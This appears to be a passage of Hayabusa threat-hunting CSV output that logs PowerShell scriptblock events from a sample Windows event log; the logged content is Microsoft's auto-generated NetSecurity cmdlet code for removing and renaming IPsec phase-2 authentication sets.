[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { 